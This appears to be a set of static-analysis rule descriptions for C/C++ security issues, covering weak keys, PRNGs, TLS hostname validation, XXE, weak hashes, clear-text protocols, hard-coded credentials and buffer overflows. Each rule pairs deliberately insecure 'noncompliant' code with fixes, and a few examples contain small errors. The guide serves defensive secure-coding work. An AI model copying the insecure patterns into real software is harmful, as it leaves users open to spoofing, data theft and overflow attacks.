#include <botan/rng.h>
#include <botan/rsa.h>

void encrypt() {
    std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::System_RNG);
    Botan::RSA_PrivateKey                           rsaKey(*rng, 2048);
}
#include <botan/dl_group.h>

void encrypt() {
    Botan::DL_Group("dsa/botan/2048");
}
#include <botan/ec_group.h>

void encrypt() {
    Botan::EC_Group("secp224k1");
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms are mentioned directly in their names. For example, secp256k1 generates a 256-bits long private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterpart.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Learn more here.

Resources

Articles & blog posts

Standards

c:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the functions rely on a pseudorandom number generator, they should not be used for security-critical applications or for protecting sensitive data.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use functions which rely on a strong random number generator such as randombytes_uniform() or randombytes_buf() from libsodium, or randomize() from Botan.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

#include <random>
// ...

void f() {
  int random_int = std::rand(); // Sensitive
}

Compliant Solution

#include <sodium.h>
#include <botan/system_rng.h>
// ...

void f() {
  char random_chars[10];
  randombytes_buf(random_chars, 10); // Compliant
  uint32_t random_int = randombytes_uniform(10); // Compliant

  uint8_t random_chars[10];
  Botan::System_RNG system;
  system.randomize(random_chars, 10); // Compliant
}

See

c:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in Botan

Code examples

The following code contains examples of disabled hostname validation.

The hostname validation gets disabled by overriding tls_verify_cert_chain with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks
{
    virtual void tls_verify_cert_chain(
              const std::vector<Botan::X509_Certificate> &cert_chain,
              const std::vector<std::shared_ptr<const Botan::OCSP::Response>> &ocsp_responses,
              const std::vector<Botan::Certificate_Store *> &trusted_roots,
              Botan::Usage_Type usage,
              const std::string &hostname,
              const Botan::TLS::Policy &policy)
    override  { }
};

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12); // Noncompliant
}

Compliant solution

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks { };

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12);
}

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Resources

Documentation

Standards

c:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

#include <botan/hash.h>
// ...

Botan::secure_vector<uint8_t> f(std::string input){
    std::unique_ptr<Botan::HashFunction> hash(Botan::HashFunction::create("MD5")); // Sensitive
    return hash->process(input);
}

Compliant Solution

#include <botan/hash.h>
// ...

Botan::secure_vector<uint8_t> f(std::string input){
    std::unique_ptr<Botan::HashFunction> hash(Botan::HashFunction::create("SHA-512")); // Compliant
    return hash->process(input);
}

See

c:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

char* http_url = "http://example.com"; // Sensitive
char* ftp_url = "ftp://anonymous@example.com"; // Sensitive
char* telnet_url = "telnet://anonymous@example.com"; // Sensitive
#include <curl/curl.h>

CURL *curl_ftp = curl_easy_init();
curl_easy_setopt(curl_ftp, CURLOPT_URL, "ftp://example.com/"); // Sensitive

CURL *curl_smtp = curl_easy_init();
curl_easy_setopt(curl_smtp, CURLOPT_URL, "smtp://example.com:587"); // Sensitive

Compliant Solution

char* https_url = "https://example.com";
char* sftp_url = "sftp://anonymous@example.com";
char* ssh_url = "ssh://anonymous@example.com";
#include <curl/curl.h>

CURL *curl_ftps = curl_easy_init();
curl_easy_setopt(curl_ftps, CURLOPT_URL, "ftp://example.com/");
curl_easy_setopt(curl_ftps, CURLOPT_USE_SSL, CURLUSESSL_ALL); // FTP transport is done over TLS

CURL *curl_smtp_tls = curl_easy_init();
curl_easy_setopt(curl_smtp_tls, CURLOPT_URL, "smtp://example.com:587");
curl_easy_setopt(curl_smtp_tls, CURLOPT_USE_SSL, CURLUSESSL_ALL); // SMTP with STARTTLS

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

c:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule looks for hard-coded credentials in variable names that match any of the patterns from the provided list.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

dbi_conn conn = dbi_conn_new("mysql");
string password = "secret"; // Sensitive
dbi_conn_set_option(conn, "password", password.c_str());

Compliant Solution

dbi_conn conn = dbi_conn_new("mysql");
string password = getDatabasePassword(); // Compliant
dbi_conn_set_option(conn, "password", password.c_str()); // Compliant

See

c:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in Xerces

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

#include "xercesc/parsers/XercesDOMParser.hpp"

void parse() {
  XercesDOMParser *DOMparser = new XercesDOMParser();
  DOMparser->setCreateEntityReferenceNodes(false); // Noncompliant
  DOMparser->setDisableDefaultEntityResolution(false); // Noncompliant

  DOMparser->parse(xmlFile);
}

By default, entities resolution is enabled for XMLReaderFactory::createXMLReader.

#include "xercesc/sax2/SAX2XMLReader.hpp"

void parse() {
  SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();
  reader->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, false); // Noncompliant

  reader->parse(xmlFile);
}

By default, entities resolution is enabled for SAXParser.

#include "xercesc/parsers/SAXParser.hpp"

void parse() {
  SAXParser* SAXparser = new SAXParser();
  SAXparser->setDisableDefaultEntityResolution(false); // Noncompliant

  SAXparser->parse(xmlFile);
}

Compliant solution

By default, XercesDOMParser is safe.

#include "xercesc/parsers/XercesDOMParser.hpp"

void parse() {
  XercesDOMParser *DOMparser = new XercesDOMParser();
  DOMparser->setCreateEntityReferenceNodes(true);
  DOMparser->setDisableDefaultEntityResolution(true);

  DOMparser->parse(xmlFile);
}
#include "xercesc/sax2/SAX2XMLReader.hpp"

void parse() {
  SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();
  reader->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);

  reader->parse(xmlFile);
}
#include "xercesc/parsers/SAXParser.hpp"

void parse() {
  SAXParser* SAXparser = new SAXParser();
  SAXparser->setDisableDefaultEntityResolution(true);

  SAXparser->parse(xmlFile);
}

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.

Resources

Standards

c:S5798

Why is this an issue?

The compiler is generally allowed to remove code that does not have any effect, according to the abstract machine of the C language. This means that if you have a buffer that contains sensitive data (for instance passwords), calling memset on the buffer before releasing the memory will probably be optimized away.

The function memset_s behaves similarly to memset, but the main difference is that it cannot be optimized away, the memory will be overwritten in all cases. You should always use this function to scrub security-sensitive data.

This rule raises an issue when a call to memset is followed by the destruction of the buffer.

Note that memset_s is defined in annex K of C11, so to have access to it, you need a standard library that supports it (this can be tested with the macro __STDC_LIB_EXT1__), and you need to enable it by defining the macro __STDC_WANT_LIB_EXT1__ before including <string.h>. Other platform specific functions can perform the same operation, for instance SecureZeroMemory (Windows) or explicit_bzero (FreeBSD)

Noncompliant code example

void f(char *password, size_t bufferSize) {
  char localToken[256];
  init(localToken, password);
  memset(password, ' ', strlen(password)); // Noncompliant, password is about to be freed
  memset(localToken, ' ', strlen(localToken)); // Noncompliant, localToken is about to go out of scope
  free(password);
}

Compliant solution

void f(char *password, size_t bufferSize) {
  char localToken[256];
  init(localToken, password);
  memset_s(password, bufferSize, ' ', strlen(password));
  memset_s(localToken, sizeof(localToken), ' ', strlen(localToken));
  free(password);
}

Resources

c:S1079

Why is this an issue?

The %s placeholder is used to read a word into a string.

By default, there is no restriction on the length of that word, and the developer is required to pass a sufficiently large buffer for storing it.

No matter how large the buffer is, there will always be a longer word.

Therefore, programs relying on %s are vulnerable to buffer overflows.

A field width specifier can be used together with the %s placeholder to limit the number of bytes which will by written to the buffer.

Note that an additional byte is required to store the null terminator.

Noncompliant code example

char buffer[10];
scanf("%s", buffer);      // Noncompliant - will overflow when a word longer than 9 characters is entered

Compliant solution

char buffer[10];
scanf("%9s", buffer);     // Compliant - will not overflow

Resources

c:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, it has led to the following vulnerabilities:

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples bellow). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such API will make sure:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed

Sensitive Code Example

#include <cstdio>
// ...

void f() {
  FILE * fp = fopen("/tmp/temporary_file", "r"); // Sensitive
}
#include <cstdio>
#include <cstdlib>
#include <sstream>
// ...

void f() {
  std::stringstream ss;
  ss << getenv("TMPDIR") << "/temporary_file"; // Sensitive
  FILE * fp = fopen(ss.str().c_str(), "w");
}

Compliant Solution

#include <cstdio>
#include <cstdlib>
// ...

void f() {
  FILE * fp = tmpfile(); // Compliant
}

See

c:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

When creating a file or directory with permissions to "other group":

open("myfile.txt", O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process set 777 permissions to this newly created file

mkdir("myfolder", S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process try to set 777 permissions to this newly created directory

When explicitly adding permissions to "other group" with chmod, fchmod or filesystem::permissions functions:

chmod("myfile.txt", S_IRWXU | S_IRWXG | S_IRWXO);  // Sensitive: the process set 777 permissions to this file

fchmod(fd, S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process set 777 permissions to this file descriptor

When defining the umask without read, write and execute permissions for "other group":

umask(S_IRWXU | S_IRWXG); // Sensitive: the further files and folders will be created with possible permissions to "other group"

Compliant Solution

When creating a file or directory, do not set permissions to "other group":

open("myfile.txt", O_CREAT, S_IRWXU | S_IRWXG); // Compliant

mkdir("myfolder", S_IRWXU | S_IRWXG); // Compliant

When using chmod, fchmod or filesystem::permissions functions, do not add permissions to "other group":

chmod("myfile.txt", S_IRWXU | S_IRWXG);  // Compliant

fchmod(fd, S_IRWXU | S_IRWXG); // Compliant

When defining the umask, set read, write and execute permissions to other group:

umask(S_IRWXO); // Compliant: further created files or directories will not have permissions set for "other group"

See

c:S1081

Why is this an issue?

When using typical C functions, it’s up to the developer to make sure the size of the buffer to be written to is large enough to avoid buffer overflows. Buffer overflows can cause the program to crash at a minimum. At worst, a carefully crafted overflow can cause malicious code to be executed.

This rule reports use of the following insecure functions, for which knowing the required size is not generally possible: gets() and getpw().

In such cases. The only way to prevent buffer overflow while using these functions would be to control the execution context of the application.

It is much safer to secure the application from within and to use an alternate, secure function which allows you to define the maximum number of characters to be written to the buffer:

  • fgets or gets_s
  • getpwuid

Noncompliant code example

gets(str); // Noncompliant; `str` buffer size is not checked and it is vulnerable to overflows

Compliant solution

gets_s(str, sizeof(str)); // Prevent overflows by enforcing a maximum size for `str` buffer

Resources

c:S5814

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strcat( char *restrict dest, const char *restrict src ); appends the characters of string src at the end of dest. The wcscat does the same for wide characters and should be used with the same guidelines.

Note: the functions strncat and wcsncat might look like attractive safe replacements for strcat and wcscaty, but they have their own set of issues (see S5815), and you should probably prefer another more adapted alternative.

Ask Yourself Whether

  • There is a possibility that either the src or the dest pointer is null
  • The current string length of dest plus the current string length of src plus 1 (for the final null character) is larger than the size of the buffer pointer-to by src
  • There is a possibility that either string is not correctly null-terminated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strcat_s and the wcscat_s that were designed as safer alternatives to strcat and wcscat. It’s not recommended to use them in all circumstances, because they introduce a runtime overhead and require to write more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, "Result: ");
  strcat(dest, src); // Sensitive: might overflow
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char result[] = "Result: ";
  char *dest = malloc(sizeof(result) + strlen(src)); // Not need of +1 for final 0 because sizeof will already count one 0
  strcpy(dest, result);
  strcat(dest, src); // Compliant: the buffer size was carefully crafted
  int r = doSomethingWith(dest);
  free(dest);
  return r;
}

See

c:S5813

The function size_t strlen(const char *s) measures the length of the string s (excluding the final null character).
The function size_t wcslen(const wchar_t *s) does the same for wide characters, and should be used with the same guidelines.

Similarly to many other functions in the standard C libraries, strlen and wcslen assume that their argument is not a null pointer.

Additionally, they expect the strings to be null-terminated. For example, the 5-letter string "abcde" must be stored in memory as "abcde\0" (i.e. using 6 characters) to be processed correctly. When a string is missing the null character at the end, these functions will iterate past the end of the buffer, which is undefined behavior.

Therefore, string parameters must end with a proper null character. The absence of this particular character can lead to security vulnerabilities that allow, for example, access to sensitive data or the execution of arbitrary code.

Ask Yourself Whether

  • There is a possibility that the pointer is null.
  • There is a possibility that the string is not correctly null-terminated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use safer functions. The C11 functions strlen_s and wcslen_s from annex K handle typical programming errors.
    Note, however, that they have a runtime overhead and require more code for error handling and therefore are not suited to every case.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions.
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone.

Sensitive Code Example

size_t f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof dest); // Truncation may happen
  return strlen(dest); // Sensitive: "dest" will not be null-terminated if truncation happened
}

Compliant Solution

size_t f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof dest); // Truncation may happen
  dest[sizeof dest - 1] = 0;
  return strlen(dest); // Compliant: "dest" is guaranteed to be null-terminated
}

See

  • MITRE, CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
  • CERT, STR07-C. - Use the bounds-checking interfaces for string manipulation
c:S5816

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strncpy(char * restrict dest, const char * restrict src, size_t count); copies the first count characters from src to dest, stopping at the first null character, and filling extra space with 0. The wcsncpy does the same for wide characters and should be used with the same guidelines.

Both of those functions are designed to work with fixed-length strings and might result in a non-null-terminated string.

Ask Yourself Whether

  • There is a possibility that either the source or the destination pointer is null
  • The security of your system can be compromised if the destination is a truncated version of the source
  • The source buffer can be both non-null-terminated and smaller than the count
  • The destination buffer can be smaller than the count
  • You expect dest to be a null-terminated string
  • There is an overlap between the source and the destination

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strncpy_s and the wcsncpy_s that were designed as safer alternatives to strcpy and wcscpy. It’s not recommended to use them in all circumstances, because they introduce a runtime overhead and require to write more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are using strncpy and wsncpy as a safer version of strcpy and wcscpy, you should instead consider strcpy_s and wcscpy_s, because these functions have several shortcomings:
    • It’s not easy to detect truncation
    • Too much work is done to fill the buffer with 0, leading to suboptimal performance
    • Unless manually corrected, the dest string might not be null-terminated
  • If you want to use strcpy and wcscpy functions and detect if the string was truncated, the pattern is the following:
    • Set the last character of the buffer to null
    • Call the function
    • Check if the last character of the buffer is still null
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof(dest)); // Sensitive: might silently truncate
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char dest[256];
  dest[sizeof dest - 1] = 0;
  strncpy(dest, src, sizeof(dest)); // Compliant
  if (dest[sizeof dest - 1] != 0) {
    // Handle error
  }
  return doSomethingWith(dest);
}

See

c:S5815

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strncat( char *restrict dest, const char *restrict src, size_t count ); appends the characters of string src at the end of dest, but only add count characters max. dest will always be null-terminated. The wcsncat does the same for wide characters, and should be used with the same guidelines.

Ask Yourself Whether

  • There is a possibility that either the src or the dest pointer is null
  • The current string length of dest plus the current string length of src plus 1 (for the final null character) is larger than the size of the buffer pointer-to by src
  • There is a possibility that either string is not correctly null-terminated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strncat_s and the wcsncat_s that were designed as safer alternatives to strncat and wcsncat. It’s not recommended to use them in all circumstances because they introduce a runtime overhead and require to write more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are using strncat and wsncat as a safer version of strcat and wcscat, you should instead consider strcat_s and wcscat_s because these functions have several shortcomings:
    • It’s not easy to detect truncation
    • The count parameter is error-prone
    • Computing the count parameter typically requires computing the string length of dest, at which point other simpler alternatives exist

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, "Result: ");
  strncat(dest, src, sizeof dest); // Sensitive: passing the buffer size instead of the remaining size
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char result[] = "Result: ";
  char dest[256];
  strcpy(dest, result);
  strncat(dest, src, sizeof dest - sizeof result); // Compliant but may silently truncate
  return doSomethingWith(dest);
}

See

c:S5824

The functions "tmpnam", "tmpnam_s" and "tmpnam_r" are all used to return a file name that does not match an existing file, in order for the application to create a temporary file. However, even if the file did not exist at the time those functions were called, it might exist by the time the application tries to use the file name to create the files. This has been used by hackers to gain access to files that the application believed were trustworthy.

There are alternative functions that, in addition to creating a suitable file name, create and open the file and return the file handler. Such functions are protected from this attack vector and should be preferred. About the only reason to use these functions would be to create a temporary folder, not a temporary file.

Additionally, these functions might not be thread-safe, and if you don’t provide them buffers of sufficient size, you will have a buffer overflow.

Ask Yourself Whether

  • There is a possibility that several threads call any of these functions simultaneously
  • There is a possibility that the resulting file is opened without forcing its creation, meaning that it might have unexpected access rights
  • The buffers passed to these functions are respectively smaller than
    • L_tmpnam for tmpnam
    • L_tmpnam_s for tmpnam_s
    • L_tmpnam for tmpnam_r

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a function that directly opens the temporary file, such a tmpfile, tmpfile_s, mkstemp or mkstemps (the last two allow more accurate control of the file name).
  • If you can’t get rid of these functions, when using the generated name to open the file, use a function that forces the creation of the file and fails if the file already exists.

Sensitive Code Example

int f(char *tempData) {
  char *path = tmpnam(NULL); // Sensitive
  FILE* f = fopen(tmpnam, "w");
  fputs(tempData, f);
  fclose(f);
}

Compliant Solution

int f(char *tempData) {
  // The file will be opened in "wb+" mode, and will be automatically removed on normal program exit
  FILE* f = tmpfile(); // Compliant
  fputs(tempData, f);
  fclose(f);
}

See

c:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

